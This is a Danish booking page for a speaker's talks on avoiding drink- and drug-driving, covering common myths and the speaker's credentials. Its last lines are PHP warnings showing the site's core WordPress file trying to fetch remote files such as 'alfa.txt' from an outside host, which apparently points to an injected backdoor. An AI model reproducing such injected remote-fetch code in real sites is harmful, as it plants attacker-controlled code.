img-us

Undgå spiritus og narkokørsel - Et foredrag for helt almindelige mennesker.
- Sådan undgår at miste dit kørekort.
- Behold dit kørekort.
- Undgå de høje straffe for primillekørsel.
- Myter om spiritus og narkokørsel.

Jeg hedder Cassian og kalder mig selv for spritministeren på de sociale medier. Jeg har mere end 5 års erfaring i at undervise nogle af landets spiritus- og narkobilister.

Du tænker måske, jamen jeg kører aldrig i påvirket tilstand. Nej, det tænker jeg heller ikke du gør. Bevidst i hvert fald - Men desværre gør vi det ofte uden at vide det!

Dem som ender med en spritdom kommer fra alle samfundslag og kan f.eks. være alle ligefra ledere, selvstændige, håndværkere, akademikere, kendte, studerende, din bedste ven, dit barn, din kæreste eller dig selv

Her er nogle af de myter, jeg møder i min hverdag:
- Man forbrænder en genstand i timen.
- Det er mest de unge som kører påvirket.
- Det er alkoholikere og narkomaner som kører påvirket.
- Det er kun bullerbasserne som finder på det.
- De overvægtige kan tåle mere.
- Efter den nye lovgivning kan jeg sagtens ryge lidt hash og køre.
- Hvis man har sovet en god nattesøvn efter en brandert kan man godt køre.
- Man sveder alkohol ud af kroppen..

Faktum er, og det er ingen hemmelighed, at det oftest er helt  almindelige mennesker med et helt almindeligt forhold til et rusmiddel som bliver dømt - Dog er 9 ud af 10 mænd og de fleste som dømmes er i alderen mellem 30 og 60 år.

På landets køreskoler undervises der meget  lidt dette emne. Det er ikke ukendt, at kørelærere går let og elegant hen over det emne. I min verden er de fleste slet ikke klædt på til opgaven.

Jeg har undervist mere end 1000 kursister på ANT-kurser og erfaret, at der i den grad er brug for forebyggelse på en ikke dømmende måde. Jeg har som den eneste i Danmark valgt at gå ud til helt almindelige mennesker, som dig for at hjælpe dig med at beholde dit kørekort.

Alle kan begå en fejl. Nogle fejl ender med en spritdom. Hvorfor? Fordi oftest ved vi ikke bedre. Så er der dem der godt ved det, men ikke kendte konsekvensen eller tog chancen.

Nu har du eller din virksomhed mulighed for at booke mig til et foredrag på 2 x 50 minutter eller et på en time og 15 min. Her vil jeg klæde jer på, så I kan være sikre på, at I kender reglerne, og dermed kan beholde jeres kørekort.

Jeg arbejder ud fra V.A.K-modellen, som handler om viden, adfærd og konsekvens. Jeg gør det på en energisk og underholdende måde, med et tvist af djævlens advokat. Det bliver ikke kedeligt! Det lover jeg!

Som mange af mine kursister siger: ”Det her anede jeg ikke, det skulle alle jo vide, som kører bil.”

Jeg vil glæde mig til at hjælpe dig med at få den fornødne viden, så du kan sikre dig dit kørekort og kunne videregive din nye viden.

Husk det sker ikke kun for naboen, det kan ske for selv dig!


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Book nu

Andre foredragsholdere

Cassian Karlsen

Peter Sørensen

Torben Rif

Joakim Seidler


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22